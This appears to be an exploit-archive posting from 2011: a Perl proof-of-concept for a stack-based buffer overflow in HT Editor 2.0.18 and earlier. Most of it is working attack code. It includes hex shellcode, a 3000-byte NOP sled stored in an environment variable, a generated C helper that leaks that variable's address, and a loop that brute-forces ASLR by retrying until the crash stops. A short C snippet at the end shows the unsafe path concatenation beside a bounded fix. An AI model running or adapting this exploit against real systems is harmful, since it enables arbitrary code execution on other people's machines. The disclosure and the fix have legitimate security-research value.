
HT Editor 2.0.18 Stack Overflow

Posted on 31 March 2011

```perl
# Exploit Title: HT Editor File opening Stack Overflow (0day)
# Date: March 30th 2011
# Author: ZadYree
# Software Link: http://hte.sourceforge.net/downloads.html
# Version: <= 2.0.18
# Tested on: Linux/Windows (buffer padding may differ on W32)
# CVE : None

#!/usr/bin/perl

=head1 TITLE

HT Editor <=2.0.18 0day Stack-Based Overflow Exploit

=head2 SYNOPSIS

my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];

=head1 DESCRIPTION

The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip.

=head2 AUTHOR

ZadYree ~ 3LRVS Team

=head3 SEE ALSO

ZadYree's blog: z4d.tuxfamily.org
3LRVS blog: 3lrvs.tuxfamily.org
Shellcode based on http://www.shell-storm.org/shellcode/files/shellcode-606.php => Thanks

=cut

use strict;
use warnings;

# Shellcode taken from shell-storm (see SEE ALSO above).
use constant SHELLCODE => "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e" .
                          "\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" .
                          "\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" .
                          "\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" .
                          "\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" .
                          "\x53\x52\x54\x8a\xe2\xce\x81";

# NOP sled placed in front of the shellcode.
use constant NOPZ => ("\x90" x 3000);

# The sled + shellcode are passed to the child via an environment variable.
$ENV{'TAPZCODE'} = (NOPZ . SHELLCODE);

# Small helper program that prints the address of TAPZCODE in the environment.
open(my $fh, ">", "g3tenv.c");
print $fh <<"EOF";
#include <stdio.h>
#include <stdlib.h>
void main() {
    printf("%x", getenv("TAPZCODE"));
}
EOF
close($fh);
system("gcc g3tenv.c -o g3tenv");
my $retaddr = qx{./g3tenv};

# Padding is 4108 bytes minus the length of the current path (see DESCRIPTION),
# followed by the return address in little-endian byte order.
my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];

# Check whether ASLR is enabled on this host.
open(my $as, "<", "/proc/sys/kernel/randomize_va_space");
my $status = <$as>;
close($as);

unless ($status != 0) {
    unlink("g3tenv.c", "g3tenv");
    exec(@$payload);
}

print "[*]ASLR detected!\12";
print "[*]Bruteforcing ASLR...\12";

# Retry until the child no longer dies with SIGSEGV (exit status 11).
while (1) {
    $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))];
    qx{@$payload};
    last unless ($? == 11);
}

unlink("g3tenv.c", "g3tenv");
die "HAPPY Hacking!";
```
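The DESCRIPTION above names the bug class: a command-line argument joined with the current path into a fixed-size stack buffer without a length check. As an added illustration (not HT Editor's code; the buffer size and function names are assumptions), the unbounded pattern is shown beside a bounded replacement that rejects inputs which would not fit:

```c
#include <stdio.h>
#include <string.h>

/* Assumed fixed stack buffer size, chosen for illustration only. */
#define PATH_BUF 4096

/* Unsafe pattern of the kind the advisory describes: cwd and the
 * argument are concatenated into a fixed buffer with no bounds check,
 * so an over-long argument (plus path) runs past the end of the buffer. */
static void join_path_unsafe(char *out, const char *cwd, const char *arg) {
    strcpy(out, cwd);
    strcat(out, "/");
    strcat(out, arg);
}

/* Bounded replacement: snprintf never writes past outsz bytes and reports
 * the length the full string would have had, so a truncated result is
 * detected and rejected instead of silently used. Returns 0 on success,
 * -1 when the joined path does not fit (out is then an empty string). */
static int join_path_safe(char *out, size_t outsz, const char *cwd, const char *arg) {
    int n = snprintf(out, outsz, "%s/%s", cwd, arg);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void) {
    char path[PATH_BUF];
    char oversized[PATH_BUF + 100];
    /* Constructed input: an argument that by itself exceeds the buffer. */
    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';

    if (join_path_safe(path, sizeof path, "/tmp", "file.bin") == 0)
        printf("ok: %s\n", path);
    if (join_path_safe(path, sizeof path, "/tmp", oversized) != 0)
        printf("rejected: argument too long for %d-byte buffer\n", PATH_BUF);
    (void)join_path_unsafe; /* shown for contrast, deliberately not called */
    return 0;
}
```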
